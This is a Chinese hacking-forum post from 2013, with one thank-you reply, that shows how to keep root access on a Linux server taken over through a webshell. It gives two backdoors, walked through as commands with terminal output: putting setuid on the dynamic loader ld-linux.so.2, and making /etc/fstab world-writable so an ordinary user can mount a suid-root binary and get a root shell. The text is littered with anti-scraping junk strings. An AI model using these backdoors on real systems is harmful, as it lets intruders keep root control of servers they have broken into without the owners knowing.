找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2989|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究8 U" t/ E" L& d
0 u3 C+ J& @) @7 c! u( b0 P
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
* q, T: V: ^( M3 d+ ]: i, q& ?lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究6 S) T* @+ b, v
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
- }% E+ @- X! C) Q[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
( q7 r( V4 v0 G[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
( J; h6 H, x8 u  _5 N% \-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究' b9 M5 s- d6 n6 o1 m
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究3 Q0 i" q( I- z2 G' ^. T
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
& y8 M+ r# R! I9 D% H, j我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究+ b4 i' I$ u3 D- {( \! k

9 L1 A+ r. {. k6 v普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
$ J7 P8 @6 _# S5 w# e
+ G. ?6 b9 J# I/ h, O0 z[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究/ F: j4 T% w7 ^0 y! ?# E
xiaoyu2ezX-BUG-关注前沿信息安全技术研究
# F' x  P5 T  }[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
9 W  W6 Z. s5 C3 h3 |3 Jroot2ezX-BUG-关注前沿信息安全技术研究
2 Q$ K- T% e7 u8 W* H[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
  v7 R3 v9 E$ h4 z恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究3 V1 }* l8 p$ W% T: a

: d2 X% x& k) ?! w: b/ q2 D! D6 R方法二:2ezX-BUG-关注前沿信息安全技术研究! A$ k6 p- s5 Z  g; j4 O- j

7 t. ]# h$ }- P* L. m" z看过程:2ezX-BUG-关注前沿信息安全技术研究2 u# ~6 b  C: e& I

# C2 ^! u. q0 D& z5 u. S[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究* n, _" h) c: n. Z5 A
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究: r; _+ u* R6 i7 x! V! f/ w# I1 L0 r& [
( Z/ P* y, }# J3 @9 `8 ~
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
. \: A8 n8 K) T. V: }* e9 _$ D- H  H# g
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
# c6 q- F/ Y2 H3 F" J# z! I-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究; t3 ~% _- [: k% y! Z7 K& o, r2 G
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
# \* M. @$ j3 I
5 H: b0 Z3 ?$ k7 e然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究! e$ M6 |# X6 o  {% c# p% a

! g6 M( \8 M: v- y0 C[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究4 f/ U) M5 o2 d; E/ c. l& W
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究8 |8 n- F2 {2 I3 [
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究& l( H$ o6 |7 ]& b
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
, K4 Q# \+ ~3 Z! r: ]1 S[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究& W  }/ e/ Z1 d! p* `" R/ g: K% T
total 182ezX-BUG-关注前沿信息安全技术研究
- ]% b( w% ?; x& A- o9 F8 X' Gdrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究' l5 Z7 \3 Y: y" u8 _* |
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究* y1 ?* y6 c4 ~
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究" S9 G% ?/ n8 U6 b) m8 [
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
4 K1 E, P5 i% H% W看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究. R6 l8 }7 V3 x' r# d" u
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
4 {4 _  @2 G/ X
# I% O$ H$ h/ }  }) F1 P; D/ y. G貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
$ w. @2 t3 {% E+ F+ w% m6 `2ezX-BUG-关注前沿信息安全技术研究+ \$ }- O/ E* ^' d& b7 N. g

! h. S- O; Q: @7 P: v  c5 }
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表